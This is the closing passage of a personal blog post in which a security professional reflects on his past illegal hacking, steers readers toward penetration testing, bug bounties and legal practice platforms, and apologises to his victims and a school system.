I think a healthy outlet for people in similar situations is to commit full time to the "light side".  Enter a job in Cyber Security as a penetration tester or red teamer; we could use you!  If that's not an option at the moment, or it's not enough, there are bug bounty programs where you're allowed to do testing and get paid to learn in the process!  There's also a plethora of free resources available online where you can test your skills in safe, sandboxed environments: capture-the-flag competitions, intentionally vulnerable virtual machines (Metasploitable, etc.), vulnerable web applications like DVWA and bWAPP, and platforms like Hack The Box, to name a few.  It's certainly no excuse, but these options weren't available back when I started, and the media almost seemed to encourage the idea of young hackers instead of condemning it.  It didn't help that Hollywood sensationalized it, and still continues to today.  I also felt like I was taking this journey alone, because at the time I didn't know anyone else who was into this.  I certainly didn't think this could be a career if done legally.  I was completely ignorant of "hacker culture", both as it was then and as it exists today.

I'm not self-centered enough to think this blog will turn away any black hats who might read it, but I do hope it helps others in a grey situation similar to my younger self's to think about their actions and consider the alternative.  It might sound corny, but we have a responsibility to put our skills to good use and fight cyber crime.  We have a vested interest in making the Internet a safer place, not just for us, but for our friends and family as well.  This field is both financially and personally rewarding when we work together to contribute to the overall "health" of our online community.  I'd like to sincerely apologize to the InfoSec community and to the victims of my hacktivities.  I'd like to especially apologize to the Sheridan school system!  I hope this blog finds its way to those affected individuals.

Thanks for listening to my story!  Please leave a comment if you agree, disagree, or just want to share a similar experience for other readers!  Also, I know what you're thinking, and no, you can't have my killer sweater.

- Curtis Brazzell